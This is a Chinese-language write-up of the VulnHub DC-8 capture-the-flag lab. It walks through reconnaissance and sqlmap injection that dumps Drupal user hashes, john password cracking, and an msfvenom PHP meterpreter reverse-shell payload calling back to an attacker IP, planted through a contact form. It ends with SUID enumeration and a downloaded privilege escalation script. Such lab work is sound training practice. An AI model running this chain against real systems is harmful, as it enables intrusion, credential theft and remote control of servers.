Vulnhub DC-8靶场

目录

搭建靶场

发现目标

信息收集

漏洞利用

 内网提权

Flag1​​​​​​​

搭建靶场

靶场下载地址

DC: 8 ~ VulnHub

 下载解压文件,并使用虚拟机软件 创建目标

Vulnhub DC-8靶场_第1张图片

发现目标

发现目标地址为192.168.152.134 

 netdiscover -r 192.168.152.0/24

 Vulnhub DC-8靶场_第2张图片

信息收集

 网站端口收集

nmap -sS -sV -A -T4 -p- 192.168.152.134

Vulnhub DC-8靶场_第3张图片

 网站指纹收集

whatweb http://192.168.152.134

Vulnhub DC-8靶场_第4张图片

 网站目录收集

dirsearch -u http://192.168.152.134/

Vulnhub DC-8靶场_第5张图片​​​​​​​ 

漏洞利用

测试注入点

Vulnhub DC-8靶场_第6张图片

 使用sqlmap进行测试

sqlmap -u "http://192.168.152.134/?nid=1"

Vulnhub DC-8靶场_第7张图片

 存在注入漏洞 并破解数据库名

sqlmap -u "http://192.168.152.134/?nid=1" --dbs

Vulnhub DC-8靶场_第8张图片

 破解d7db 中的表名

sqlmap -u "http://192.168.152.134/?nid=1 -D d7db --tables

Vulnhub DC-8靶场_第9张图片

 破解users中的列名

sqlmap -u "http://192.168.152.134/?nid=1 -D d7db -T users --columns

Vulnhub DC-8靶场_第10张图片

 查看数据库中存储的用户与密码

sqlmap -u "http://192.168.152.134/?nid=1 -D d7db -T users -C name,pass --dump

Vulnhub DC-8靶场_第11张图片

尝试破解密码

john john --wordlist=/usr/share/wordlists/rockyou.txt

Vulnhub DC-8靶场_第12张图片

 利用账号密码john/turtle登入后台 

http://192.168.152.134/user/login

Vulnhub DC-8靶场_第13张图片

 生成Webshell 并发现新增页面写入读取失败

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.152.128 LPROT=4444 -f raw >test.php

Vulnhub DC-8靶场_第14张图片

 发现contact us可写入

Vulnhub DC-8靶场_第15张图片

Vulnhub DC-8靶场_第16张图片

启动msf的监听 并提交测试Vulnhub DC-8靶场_第17张图片

 Vulnhub DC-8靶场_第18张图片

 内网提权

获取交互式shell 并试着查询可提权信息 

python -c "import pty;pty.spawn('/bin/bash')"
find / -user root -perm -4000 -print 2>/dev/nul

Vulnhub DC-8靶场_第19张图片

将脚本文件放入apach2服务文件中

Vulnhub DC-8靶场_第20张图片

 在目标上下载提权脚本 发现权限不足 

Vulnhub DC-8靶场_第21张图片

寻找可写入文件 下载提权脚本 

Vulnhub DC-8靶场_第22张图片

 授予执行权限,并成功提权

Vulnhub DC-8靶场_第23张图片

Flag1

查看root目录下flag 

Vulnhub DC-8靶场_第24张图片

你可能感兴趣的:(安全)